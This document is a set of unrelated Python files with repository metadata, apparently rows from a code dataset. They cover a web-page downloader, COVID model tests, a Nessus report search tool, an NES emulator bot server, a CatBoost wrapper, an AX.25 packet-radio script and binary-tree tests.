981ec207c6c2d55efb10f137fec0bbf06df50cbb
|
[
"MIT"
] | null | null | null |
1 - companies_list_downloader.py
|
B-Jugurtha/Project-01--Web-scraping---Data-cleaning
|
981ec207c6c2d55efb10f137fec0bbf06df50cbb
|
[
"MIT"
] | null | null | null |
1 - companies_list_downloader.py
|
B-Jugurtha/Project-01--Web-scraping---Data-cleaning
|
981ec207c6c2d55efb10f137fec0bbf06df50cbb
|
[
"MIT"
] | null | null | null |
from bs4 import BeautifulSoup as bs
from pathlib import Path
import os
import glob
import time
import random
import requests
pwd = os.getcwd()
page_counter = 1
URL = "https://www.example.com/companies/?page="
# Creating 'pages' folder if this one exists deletes it's content
try:
Path(pwd + '/pages').mkdir(parents=True, exist_ok=False)
except FileExistsError:
print("File Already exists, Deleting it's content...")
files = glob.glob(pwd + '/pages/*')
for f in files:
os.remove(f)
time.sleep(5)
while page_counter <= 400:
page = requests.get(URL+str(page_counter))
soup = bs(page.content, "html.parser")
if(page_counter % 10 == 0):
time.sleep(random.randrange(8, 13))
print(page_counter)
with open('pages/'+str(page_counter)+".html", "w", encoding='utf-8') as file:
file.write(str(soup))
page_counter += 1
| 23.945946
| 81
| 0.667043
| 130
| 886
| 4.484615
| 0.561538
| 0.132075
| 0.041166
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019635
| 0.19526
| 886
| 36
| 82
| 24.611111
| 0.798036
| 0.071106
| 0
| 0
| 0
| 0
| 0.154689
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.259259
| 0
| 0.259259
| 0.074074
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee33559773aa94f6134aaa49252ad4b6b825ef37
| 791
|
py
|
Python
|
tests/test_apps/test_covid_preprocessing.py
|
jtrauer/AuTuMN
|
2e1defd0104bbecfe667b8ea5ecaf4bc6741905c
|
[
"BSD-2-Clause-FreeBSD"
] | 14
|
2020-03-11T06:15:30.000Z
|
2022-03-09T03:38:35.000Z
|
tests/test_apps/test_covid_preprocessing.py
|
jtrauer/AuTuMN
|
2e1defd0104bbecfe667b8ea5ecaf4bc6741905c
|
[
"BSD-2-Clause-FreeBSD"
] | 96
|
2020-01-29T05:10:29.000Z
|
2022-03-31T01:48:46.000Z
|
tests/test_apps/test_covid_preprocessing.py
|
monash-emu/AuTuMN
|
fa3b81ef54cf561e0e7364a48f4ff96585dc3310
|
[
"BSD-2-Clause-FreeBSD"
] | 10
|
2020-04-24T00:38:00.000Z
|
2021-08-19T16:19:03.000Z
|
import numpy as np
from autumn.models.covid_19.detection import create_cdr_function
def test_cdr_intercept():
"""
Test that there is zero case detection when zero tests are performed
"""
for cdr_at_1000_tests in np.linspace(0.05, 0.5, 10):
cdr_function = create_cdr_function(1000.0, cdr_at_1000_tests)
assert cdr_function(0.0) == 0.0
def test_cdr_values():
"""
Test that CDR is always a proportion, bounded by zero and one
"""
for cdr_at_1000_tests in np.linspace(0.05, 0.5, 10):
cdr_function = create_cdr_function(1000.0, cdr_at_1000_tests)
for i_tests in list(np.linspace(0.0, 1e3, 11)) + list(np.linspace(0.0, 1e5, 11)):
assert cdr_function(i_tests) >= 0.0
assert cdr_function(i_tests) <= 1.0
| 30.423077
| 89
| 0.672566
| 133
| 791
| 3.766917
| 0.368421
| 0.175649
| 0.071856
| 0.111776
| 0.487026
| 0.331337
| 0.331337
| 0.331337
| 0.331337
| 0.331337
| 0
| 0.100977
| 0.223767
| 791
| 25
| 90
| 31.64
| 0.714984
| 0.164349
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.166667
| false
| 0
| 0.166667
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee350ea74f60bf255d219e07c176125875586383
| 5,339
|
py
|
Python
|
nessussearch.py
|
canidorichard/nessussearch
|
7b4623f0b3a3fb60706eb39785ea4f7a1cebf800
|
[
"BSD-2-Clause-FreeBSD"
] | 1
|
2020-06-30T15:53:03.000Z
|
2020-06-30T15:53:03.000Z
|
nessussearch.py
|
canidorichard/nessussearch
|
7b4623f0b3a3fb60706eb39785ea4f7a1cebf800
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
nessussearch.py
|
canidorichard/nessussearch
|
7b4623f0b3a3fb60706eb39785ea4f7a1cebf800
|
[
"BSD-2-Clause-FreeBSD"
] | 2
|
2020-08-05T23:25:36.000Z
|
2020-09-26T10:01:18.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2019, Richard Hughes All rights reserved.
# Released under the BSD license. Please see LICENSE.md for more information.
import sys
import os
import argparse
import glob
import xml.dom.minidom
import re
# Define command line arguments
parms=argparse.ArgumentParser()
parms.add_argument("-f", "--file", type=str, required=False, default="*.nessus", help="Specify input file(s)")
parms.add_argument("-c", "--case_sensitive", required=False, action="store_true", help="Case sensitive search")
parms.add_argument("-d", "--debug", required=False, action="store_true", help="Debug output")
parms.add_argument("-o", "--output", type=str, required=False, default="xml_min", choices=['xml','xml_min','ipv4',"mac","mac+ipv4","ports","script"], help="Specify output format")
parms.add_argument("-p", "--path", type=str, required=False, default=".", help="Specify location of file(s)")
parms.add_argument("-r", "--regex", type=str, required=True, help="Search expression")
args = vars(parms.parse_args())
# Globals
errorsexist = False
# Main processing
def main(args):
# If output format is XML then add root element
if args['output'] == "xml":
print("<NessusClientData_v2>")
# Generate list of files and pass for processing
for file in glob.glob(args['path'] + "/" + args['file']):
# Process file if it is not empty
if os.path.getsize(file) > 0:
procFile(file)
# If output format is XML then close root element
if args['output'] == "xml":
print("</NessusClientData_v2>")
if(not args['debug'] and errorsexist): print("\nWARNING: Run with -d to see files that could not be processed", file=sys.stderr)
# Process file
def procFile(file):
global errorsexist
# Parse XML file
try:
doc=xml.dom.minidom.parse(file)
# Verify this is a Nessus output file
if doc.getElementsByTagName("NessusClientData_v2"):
# Compile regular expression
if not args['case_sensitive']:
regexp = re.compile(args['regex'], re.IGNORECASE)
else:
regexp = re.compile(args['regex'])
procDocument(doc,regexp)
else:
if args['debug']: print("WARNING: " + file + " is not a valid Nmap output file", file=sys.stderr)
errorsexist=True
except:
if args['debug']: print("WARNING: Unable to parse " + file, file=sys.stderr)
errorsexist=True
# Process document
def procDocument(doc,regexp):
# Extract hosts
hosts=doc.getElementsByTagName("ReportHost")
for host in hosts:
# Check for regular expression match
if regexp.search(host.toxml()):
# Get host tags
tags=host.getElementsByTagName("tag")
addr_ipv4=""
addr_mac=""
hostname=""
for tag in tags:
tagname=tag.getAttribute("name")
tagvalue=tag.firstChild.data
if tagname == "host-ip": addr_ipv4 = tagvalue
if tagname == "host-fqdn": hostname = tagvalue
# Output minimal XML
if args['output'] == "xml_min":
hostxml=host.toxml()
for m in regexp.finditer(hostxml):
idxStart = m.start(0)
idxStart = hostxml.rfind("<", 0, idxStart)
idxEnd = m.end(0)
print("")
print("Host-FQDN: " + hostname)
print("Host-Addr: " + addr_ipv4)
print("")
print(hostxml[idxStart:idxEnd])
# Output XML
elif args['output'] == "xml":
print(host.toxml())
# Output addresses
if args['output'] == "ipv4" and addr_ipv4 != "": print(addr_ipv4)
if args['output'] == "mac" and addr_mac != "": print(addr_mac)
if args['output'] == "mac+ipv4" and addr_ipv4 != "": print(addr_mac + "|" + addr_ipv4)
# Output port list
if args['output'] == "ports":
ssl_list = []
out_list = []
items=host.getElementsByTagName("ReportItem")
# Discover which ports have SSL/TLS
for item in items:
portid=item.getAttribute("port")
plugin=item.getAttribute("pluginName")
if plugin == "SSL / TLS Versions Supported":
if portid not in ssl_list:
ssl_list.append(portid)
# Get port details from ReportItem elements
for item in items:
portid=item.getAttribute("port")
name=item.getAttribute("svc_name")
if name == "www": name = "http"
tunnel=""
if portid in ssl_list:
tunnel="ssl"
if name == "http" and tunnel == "ssl":
name = "https"
# Regex must be found in portid or service name
if(regexp.search(portid) or regexp.search(name)):
if portid not in out_list:
print(addr_ipv4+"|"+portid+"|"+name+"|"+tunnel+"|open")
out_list.append(portid)
# Output script output
if args['output'] == "script":
items=host.getElementsByTagName("ReportItem")
for item in items:
portid=item.getAttribute("port")
scripts=item.getElementsByTagName("plugin_output")
for script in scripts:
if regexp.search(script.toxml()):
print("")
print("Host-FQDN: " + hostname + ":" + portid)
print("Host-Addr: " + addr_ipv4 + ":" + portid)
print(script.firstChild.data)
if __name__ == '__main__':
# Execute main method
main(args)
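# Example invocations (illustrative; the flags are the ones defined above):
#   ./nessussearch.py -r "SSL" -o ports -p ./scans
#   ./nessussearch.py -r "10\.0\.0\." -o ipv4 -f "*.nessus"
#   ./nessussearch.py -r "plugin_output" -o script -d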
| 33.36875
| 179
| 0.617906
| 661
| 5,339
| 4.919818
| 0.299546
| 0.01845
| 0.02952
| 0.01845
| 0.230935
| 0.135301
| 0.067036
| 0.067036
| 0.030135
| 0
| 0
| 0.006184
| 0.242742
| 5,339
| 159
| 180
| 33.578616
| 0.79817
| 0.145533
| 0
| 0.161905
| 0
| 0
| 0.175965
| 0.009482
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0
| 0.057143
| 0
| 0.085714
| 0.180952
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee36deec1ce296c7314b585757c03cbcb17ed182
| 5,109
|
py
|
Python
|
pykitml/fceux.py
|
RainingComputers/pykitml
|
1c3e50cebcdb6c4da63979ef9a812b44d23a4857
|
[
"MIT"
] | 34
|
2020-03-06T07:53:43.000Z
|
2022-03-13T06:12:29.000Z
|
pykitml/fceux.py
|
RainingComputers/pykitml
|
1c3e50cebcdb6c4da63979ef9a812b44d23a4857
|
[
"MIT"
] | 6
|
2021-06-08T22:43:23.000Z
|
2022-03-08T13:57:33.000Z
|
pykitml/fceux.py
|
RainingComputers/pykitml
|
1c3e50cebcdb6c4da63979ef9a812b44d23a4857
|
[
"MIT"
] | 1
|
2020-11-30T21:20:32.000Z
|
2020-11-30T21:20:32.000Z
|
import warnings
import socket
class FCEUXServer:
'''
Server class for making NES bots. Uses FCEUX emulator.
Visit https://www.fceux.com for info. You will also need to
load client lua script in the emulator.
'''
def __init__(self, frame_func, quit_func=None, ip='localhost', port=1234):
'''
Parameters
----------
frame_func : function
This function will be called every frame. The function should
accept two argument, :code:`server` (reference to this class)
and :code:`frame` (number of frames executed).
quit_func : function
This function will be executed when the server disconnects from
the emulator
ip : str
IP address of the computer.
port : int
Port to listen to.
'''
# Establish connection with client
self._serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._serversocket.bind((ip, port))
self._serversocket.listen(5)
self._clientsocket, self._address = self._serversocket.accept()
# This function will be called every frame
self._on_frame_func = frame_func
self._on_quit_func = quit_func
self._server_info = self.recv() + ' ' + str(self._address)
self.send('ACK')
@property
def info(self):
'''
Emulator info and lua version.
'''
return self._server_info
def send(self, msg):
'''
Send message to lua code running on the emulator.
Parameters
----------
msg : str
'''
if(not type(msg) is str):
self.quit()
raise TypeError('Arguments have to be string')
self._clientsocket.send(bytes(msg+'\n', 'utf-8'))
def recv(self):
'''
Receive message from lua code running on emulator.
Returns
-------
str
Received message from emulator.
'''
return self._clientsocket.recv(4096).decode('utf-8')
def init_frame(self):
'''
Signal server to prep for next frame and returns
frame count
Returns
-------
int
Frame count
'''
# Receive message from client
frame_str = self.recv()
if(len(frame_str) == 0):
self.quit('Client has quit.')
frame = int(frame_str)
return frame
def start(self):
'''
Starts the server, waits for emulator to connect.
Calls :code:`frame_func` every frame after connection
has been established.
'''
try:
# Keep receiving messaged from FCEUX and acknowledge
while True:
frame = self.init_frame()
self._on_frame_func(self, frame)
except BrokenPipeError:
self.quit('Client has quit.')
except KeyboardInterrupt:
self.quit()
def frame_advance(self):
'''
Move to next frame, should be called at the end of
:code:`frame_func`.
'''
# Send back continue message
self.send('CONT')
def get_joypad(self):
'''
Returns
-------
str
Joypad button states.
'''
self.send('JOYPAD')
return self.recv()
def set_joypad(self, up=False, down=False, left=False,
right=False, A=False, B=False, start=False, select=False):
'''
Set joypad button states.
'''
self.send('SETJOYPAD')
joypad = str(up)+' '+str(down)+' '+str(left)+' '+str(right)\
+' '+str(A)+' '+str(B)+' '+str(start)+' '+str(select)
self.send(joypad)
def read_mem(self, addr, signed=False):
'''
Read memory address.
Parameters
----------
addr : int
The memory address to read
signed : bool
If :code:`True`, returns signed integer
Returns
-------
int
The byte at the address.
'''
self.send('MEM')
self.send(str(addr))
unsigned = int(self.recv())
if(signed):
return unsigned-256 if unsigned>127 else unsigned
else:
return unsigned
def reset(self):
'''
Resets the emulator, executes a power cycle.
'''
self.send('RES')
def quit(self, reason=''):
'''
Disconnect from emulator.
Parameters
----------
reason : str
Reason for quitting.
'''
if(self._on_quit_func is not None):
self._on_quit_func()
self._serversocket.close()
self._clientsocket.close()
print(reason)
print('Server has quit.')
exit()
if(__name__ == '__main__'):
def on_frame(server, frame):
print(frame)
print(server.get_joypad())
server.frame_advance()
server = FCEUXServer(on_frame)
print(server.info)
server.start()
| 26.609375
| 78
| 0.533372
| 558
| 5,109
| 4.767025
| 0.317204
| 0.02406
| 0.018045
| 0.020301
| 0.07406
| 0.041353
| 0.025564
| 0
| 0
| 0
| 0
| 0.005481
| 0.357213
| 5,109
| 191
| 79
| 26.748691
| 0.804507
| 0.326287
| 0
| 0.027027
| 0
| 0
| 0.04991
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.175676
| false
| 0
| 0.027027
| 0
| 0.297297
| 0.067568
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee38deebe1bb8166653f041ac6b217f4fdba49db
| 5,480
|
py
|
Python
|
gossipcat/dev/CAT.py
|
Ewen2015/GossipCat
|
6792c2ddee16515d9724583c9b57f332cff4b206
|
[
"Apache-2.0"
] | 2
|
2017-12-17T06:24:43.000Z
|
2018-01-17T08:27:52.000Z
|
gossipcat/dev/CAT.py
|
Ewen2015/GossipCat
|
6792c2ddee16515d9724583c9b57f332cff4b206
|
[
"Apache-2.0"
] | null | null | null |
gossipcat/dev/CAT.py
|
Ewen2015/GossipCat
|
6792c2ddee16515d9724583c9b57f332cff4b206
|
[
"Apache-2.0"
] | 1
|
2017-12-12T16:00:48.000Z
|
2017-12-12T16:00:48.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
author: Ewen Wang
email: wolfgangwong2012@gmail.com
license: Apache License 2.0
"""
import warnings
warnings.filterwarnings('ignore')
import random
random.seed(0)
import time
import json
import pandas as pd
import matplotlib.pyplot as plt
import catboost as cb
class CAT(object):
"""docstring for CAT"""
def __init__(self, data, indcol, target, features, features_cat, predicting=False, multi=0, balanced=0, gpu=0, seed=0):
super(CAT, self).__init__()
self.data = data
self.indcol = indcol
self.features = features
self.features_cat = features_cat
self.predicting = predicting
self.data[self.features_cat] = self.data[self.features_cat].fillna('NaN')
if self.predicting:
self.target = None
self.dtest = cb.Pool(data=self.data[self.features],
cat_features=self.features_cat)
else:
self.target = target
self.dtrain = cb.Pool(data=self.data[self.features],
label=self.data[self.target],
cat_features=self.features_cat)
self.multi = multi
self.balanced = balanced
self.gpu = gpu
self.seed = seed
self.params = {}
self.cvr = pd.DataFrame()
self.prediction = pd.DataFrame()
def algorithm(self, iterations=100, early_stopping_rounds=20, nfold=10, type='Classical', loss_function='Logloss', verbose=100, plot=False):
self.params['iterations'] = iterations
self.params['early_stopping_rounds'] = early_stopping_rounds
self.params['loss_function'] = loss_function
self.params['verbose'] = verbose
message = 'cross validation started; it will stop if performance does not improve in {} rounds.'.format(early_stopping_rounds)
print(message)
self.cvr = cb.cv(dtrain=self.dtrain,
params=self.params,
nfold=nfold,
seed=self.seed,
type=type,
plot=plot)
self.n_rounds = self.cvr.shape[0]
message = 'cross validation done with number of rounds: {}.'.format(self.n_rounds)
print(message)
message = 'test {}: {:.3f}'.format(self.params['loss_function'], self.cvr.iloc[-1, 1])
print(message)
return self.n_rounds
def train(self, path_model=None):
try:
message = 'number of training rounds: %d.' % self.n_rounds
print(message)
except Exception as e:
message = 'no hyperparameters assigned; using defaults.'
print(message)
self.algorithm()
print(json.dumps(self.params, indent=4))
self.bst = cb.CatBoostClassifier(iterations=self.n_rounds)
self.bst.fit(self.dtrain)
if path_model == None:
pass
else:
self.bst.save_model(path_model)
print('model saved in path: %s' % path_model)
self.prediction[self.indcol] = self.data[self.indcol]
self.prediction['prob'] = self.bst.predict_proba(self.dtrain)[:,1]
self.prediction['pred'] = self.bst.predict(self.dtrain)
message = 'prediction done.'
print(message)
return None
def predict(self, path_model, path_result=None):
self.bst = cb.CatBoostClassifier()
self.bst.load_model(path_model)
message = 'model loaded from path: {}'.format(path_model)
print(message)
self.prediction[self.indcol] = self.data[self.indcol]
self.prediction['prob'] = self.bst.predict_proba(self.dtest)[:,1]
self.prediction['pred'] = self.bst.predict(self.dtest)
message = 'prediction done.'
print(message)
if path_result == None:
pass
else:
self.prediction.to_csv(path_result, index=False)
message = 'results saved in path: %s' % path_result
print(message)
return None
def learning_curve(self, figsize=(10, 5)):
if len(self.cvr) == 0:
return 'no models trained, no learning curves.'
plt.figure(figsize=figsize)
plt.plot(self.cvr[self.cvr.columns[1]], label='test')
plt.plot(self.cvr[self.cvr.columns[3]], label='train')
plt.title('learning curve')
plt.xlabel('number of rounds')
plt.ylabel(self.params['loss_function'])
plt.legend(loc='lower right', title='dataset')
plt.grid()
plt.show()
return None
def report(self):
try:
from gossipcat.Report import Visual
except Exception as e:
print('[WARNING] Package GossipCat not installed.')
try:
from Report import Visual
except Exception as e:
return '[ERROR] Package Report not installed.'
test_target = self.data[self.target]
prob = self.prediction['prob']
plt.figure(figsize=(6, 5.5))
self.prediction['prob'].hist(bins=100)
plt.title('distribution of predictions')
vis = Visual(test_target=test_target, test_predprob=prob)
vis.combo()
self.df_cap = vis.df_cap
return None
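# Hypothetical smoke test with synthetic data (all column names are made up):
import numpy as np
demo = pd.DataFrame({'id': range(200),
                     'cat_a': np.random.choice(list('xyz'), 200),
                     'num_b': np.random.rand(200),
                     'y': np.random.randint(0, 2, 200)})
cat = CAT(demo, indcol='id', target='y',
          features=['cat_a', 'num_b'], features_cat=['cat_a'])
cat.algorithm(iterations=50, nfold=3)
cat.train()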
| 33.82716
| 144
| 0.578102
| 633
| 5,480
| 4.913112
| 0.28594
| 0.028296
| 0.030868
| 0.025723
| 0.227653
| 0.137621
| 0.137621
| 0.07717
| 0.053376
| 0.053376
| 0
| 0.011114
| 0.310401
| 5,480
| 162
| 145
| 33.82716
| 0.811855
| 0.02792
| 0
| 0.243902
| 0
| 0
| 0.124012
| 0.003952
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04878
| false
| 0.01626
| 0.073171
| 0
| 0.186992
| 0.097561
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee39158935f040d9514500c148f834c9e0815920
| 4,698
|
py
|
Python
|
kiss.py
|
QuantumEF/AX25-Chat
|
d2f8f8b5b3a968c6982dd013c5860aab461e4dc6
|
[
"MIT"
] | null | null | null |
kiss.py
|
QuantumEF/AX25-Chat
|
d2f8f8b5b3a968c6982dd013c5860aab461e4dc6
|
[
"MIT"
] | null | null | null |
kiss.py
|
QuantumEF/AX25-Chat
|
d2f8f8b5b3a968c6982dd013c5860aab461e4dc6
|
[
"MIT"
] | 1
|
2020-09-16T03:19:18.000Z
|
2020-09-16T03:19:18.000Z
|
#!/usr/bin/python
import sys
import socket
import asyncio
import select
from hexdump import hexdump
KISS_FEND = 0xC0 # Frame start/end marker
KISS_FESC = 0xDB # Escape character
KISS_TFEND = 0xDC # If after an escape, means there was an 0xC0 in the source message
KISS_TFESC = 0xDD # If after an escape, means there was an 0xDB in the source message
class kiss_ax25:
def __init__(self, callsign, kiss_tcp_addr="127.0.0.1", kiss_tcp_port=8001):
self.callsign = callsign
self.kiss_addr = kiss_tcp_addr
self.kiss_port = kiss_tcp_port
self.src_addr = encode_address(callsign.upper(), True)
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect((self.kiss_addr, self.kiss_port))
self.poller = select.poll()
self.poller.register(self.s, select.POLLIN)
def send(self, dest_call, message):
dest_addr = encode_address(dest_call.upper(), False)
c_byte = [0x03] # This is a UI frame
pid = [0xF0] # No protocol
msg = [ord(c) for c in message]
packet = dest_addr + self.src_addr + c_byte + pid + msg
# Escape the packet in case either KISS_FEND or KISS_FESC ended up in our stream
packet_escaped = []
for x in packet:
if x == KISS_FEND:
packet_escaped += [KISS_FESC, KISS_TFEND]
elif x == KISS_FESC:
packet_escaped += [KISS_FESC, KISS_TFESC]
else:
packet_escaped += [x]
# Build the frame that we will send to Dire Wolf and turn it into a string
kiss_cmd = 0x00 # Two nybbles combined - TNC 0, command 0 (send data)
kiss_frame = [KISS_FEND, kiss_cmd] + packet_escaped + [KISS_FEND]
output = bytearray(kiss_frame)
self.s.send(output)
def recv(self):
recv_data = []
message=''
msg_bit = False
fdVsEvent = self.poller.poll(500)
if fdVsEvent == []:
return "None", "None"
for descriptor, Event in fdVsEvent:
recv_byte = self.s.recv(1)  # discard one byte (the frame's opening KISS_FEND)
recv_byte = b'\x00'  # prime the loop; real bytes are read below
while recv_byte != KISS_FEND:
recv_byte = ord(self.s.recv(1))
if recv_byte == 0xF0:
msg_bit = True
if msg_bit:
message+=chr(recv_byte)
recv_data.append(recv_byte)
source = decode_address(recv_data[1+7:8+7])
hexdump(''.join(message))
return source, ''.join(message)
def kill(self):
self.s.shutdown(socket.SHUT_RD)
#self.s.close()
def recv_kiss():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8001))
print("Recieving")
recv_data = []
recv_byte = s.recv(1)
while True:
recv_byte = s.recv(1)
print(recv_byte)
if recv_byte == b'\xc0':
#print("End of Transmission")
break
recv_data += recv_byte
s.close()
return recv_data
#Code below here slightly modified from https://thomask.sdf.org/blog/2018/12/15/sending-raw-ax25-python.html
def send_kiss(source_call, dest_call, message):
# Make a UI frame by concatenating the parts together
# This is just an array of ints representing bytes at this point
dest_addr = encode_address(dest_call.upper(), False)
src_addr = encode_address(source_call.upper(), True)
c_byte = [0x03] # This is a UI frame
pid = [0xF0] # No protocol
msg = [ord(c) for c in message]
packet = dest_addr + src_addr + c_byte + pid + msg
# Escape the packet in case either KISS_FEND or KISS_FESC ended up in our stream
packet_escaped = []
for x in packet:
if x == KISS_FEND:
packet_escaped += [KISS_FESC, KISS_TFEND]
elif x == KISS_FESC:
packet_escaped += [KISS_FESC, KISS_TFESC]
else:
packet_escaped += [x]
# Build the frame that we will send to Dire Wolf and turn it into a string
kiss_cmd = 0x00 # Two nybbles combined - TNC 0, command 0 (send data)
kiss_frame = [KISS_FEND, kiss_cmd] + packet_escaped + [KISS_FEND]
output = bytes(bytearray(kiss_frame)) # bytes() works on Python 2 and 3; str(bytearray(...)) broke on Python 3
#hexdump(bytearray(kiss_frame))
# Connect to Dire Wolf listening on port 8001 on this machine and send the frame
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8001))
s.send(output)
s.close()
# Addresses must be 6 bytes plus the SSID byte, each character shifted left by 1
# If it's the final address in the header, set the low bit to 1
# Ignoring command/response for simple example
def encode_address(s, final):
if "-" not in s:
s = s + "-0" # default to SSID 0
call, ssid = s.split('-')
if len(call) < 6:
call = call + " "*(6 - len(call)) # pad with spaces
encoded_call = [ord(x) << 1 for x in call[0:6]]
encoded_ssid = (int(ssid) << 1) | 0b01100000 | (0b00000001 if final else 0)
return encoded_call + [encoded_ssid]
def decode_address(s):
call = [chr(x>>1) for x in s[0:6]]
ssid = str( (s[6] >> 1) & 0b00001111) # low four bits after the shift carry the SSID
#print(str(call)+":"+ssid)
return ''.join(call)+'-'+ssid
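# Illustrative round trip (assuming the SSID-mask fix above):
#   decode_address(encode_address("N0CALL-3", True)) -> "N0CALL-3"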
#send_kiss("kn4vhm","km4yhi","hi")
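# Minimal usage sketch (hypothetical callsigns; assumes a KISS TNC such as
# Dire Wolf listening on 127.0.0.1:8001):
#   radio = kiss_ax25("N0CALL")
#   radio.send("N0CALL-1", "hello")
#   src, msg = radio.recv() # returns ("None", "None") on a 500 ms poll timeout
#   radio.kill()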
| 33.557143
| 108
| 0.686037
| 764
| 4,698
| 4.060209
| 0.269634
| 0.030948
| 0.032882
| 0.027079
| 0.401032
| 0.378788
| 0.378788
| 0.378788
| 0.3343
| 0.321083
| 0
| 0.036036
| 0.196679
| 4,698
| 140
| 109
| 33.557143
| 0.785904
| 0.278629
| 0
| 0.351852
| 0
| 0
| 0.017257
| 0
| 0
| 0
| 0.013091
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.046296
| 0
| 0.175926
| 0.018519
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee3cb7c19d0619f9abd1c5afe9d9065a4239aee4
| 7,451
|
py
|
Python
|
Tree_test.py
|
nelliesnoodles/PythonBinaryTree
|
a5964cbb991cbd5007a5253bd48bc83eb56dc0ca
|
[
"MIT"
] | null | null | null |
Tree_test.py
|
nelliesnoodles/PythonBinaryTree
|
a5964cbb991cbd5007a5253bd48bc83eb56dc0ca
|
[
"MIT"
] | null | null | null |
Tree_test.py
|
nelliesnoodles/PythonBinaryTree
|
a5964cbb991cbd5007a5253bd48bc83eb56dc0ca
|
[
"MIT"
] | null | null | null |
from random import randint
from BST_version_3 import BinaryTreeNode, BinaryTree
# I have to keep the lists under 3,000 items total:
# my computer starts to run out of memory around 10,000,
# it slows at 3,000,
# and count() hits the recursion depth limit around 2,000 items.
def test_set():
oaktree = BinaryTree(50.5)
for i in range(0, 50):
oaktree.set(i, 'crunchy leaves')
assert oaktree._size == 50
for i in range(50, 100):
oaktree.set(i, 'acorns')
assert oaktree._size == 100
for i in range(0, 50):
oaktree.set(i, 'gypsy moths')
assert oaktree._size == 100
def test_count():
mapletree = BinaryTree(75.5)
for i in range(0, 100):
x = randint(1, 100)
mapletree.set(x, 'climbable')
assert mapletree._size == mapletree.count()
for i in range(0, 50):
x = randint(100, 150)
mapletree.set(x, 'shade')
assert mapletree._size == mapletree.count()
pinetree = BinaryTree(80.5)
for i in range(0, 160):
pinetree.set(i, 'christmas')
assert pinetree.count() == 160
pinetree.set(161, 'needles')
assert pinetree.count() == 161
def test_delete():
oaktree = BinaryTree(50.5)
for i in range(0, 50):
oaktree.set(i, 'crunchy leaves')
pinetree = BinaryTree(80.5)
for i in range(0, 160):
pinetree.set(i, 'christmas')
oaktree.delete(1)
assert oaktree.count() == 49
assert oaktree._size == 49
oaktree.delete(25)
assert oaktree.count() == 48
assert oaktree._size == 48
for i in range(0, 160):
pinetree.delete(i)
assert pinetree.count() == 0
assert pinetree._size == 0
for i in range(2, 25):
oaktree.delete(i)
assert oaktree.count() == 25
assert oaktree._size == 25
redwood = BinaryTree(11.5)
redlist = []
for i in range(0, 40):
x = randint(0, 40)
if x not in redlist:
redlist.append(x)
redwood.set(x, 'not 40')
assert redwood.count() != 40 # count is a method; without () the assert was vacuously true
length_redlist = len(redlist)
assert redwood._size == length_redlist
for i in range(0, length_redlist):
redwood.delete(redlist[i])
assert redwood._size == 0
## was a FAIL...
## fixed: delete() was removing both temp.left and temp.right;
## it should only remove the temp link that matched the key (akey)
## we want to delete.
assert redwood.count() == redwood._size
rightsided = BinaryTree(5.5)
righty = []
for i in range(0, 50):
rightsided.set(i, "slide to the right.")
righty.append(i)
assert len(righty) == rightsided._size
for i in range(0, 50):
rightsided.delete(i)
assert rightsided._size == 0
leftsided = BinaryTree(100.5)
lefty = []
for i in range(0, 50):
leftsided.set(i, "slide to the left")
lefty.append(i)
assert len(lefty) == leftsided._size
#### random leftsided rightsided
for i in range(0, 50):
x = randint(6, 50)
rightsided.set(x, "one hop this time")
righty2 = rightsided.make_key_list()
assert len(righty2) == rightsided._size
jump_jump = rightsided._size
for i in range(0, jump_jump):
x = righty2[i]
rightsided.delete(x)
assert rightsided._size == rightsided.count() == 0
for i in range(0, 50):
x = randint(0, 90)
leftsided.set(x, "cha-cha now ya'all.")
lefty2 = leftsided.make_key_list()
assert len(lefty2) == leftsided._size
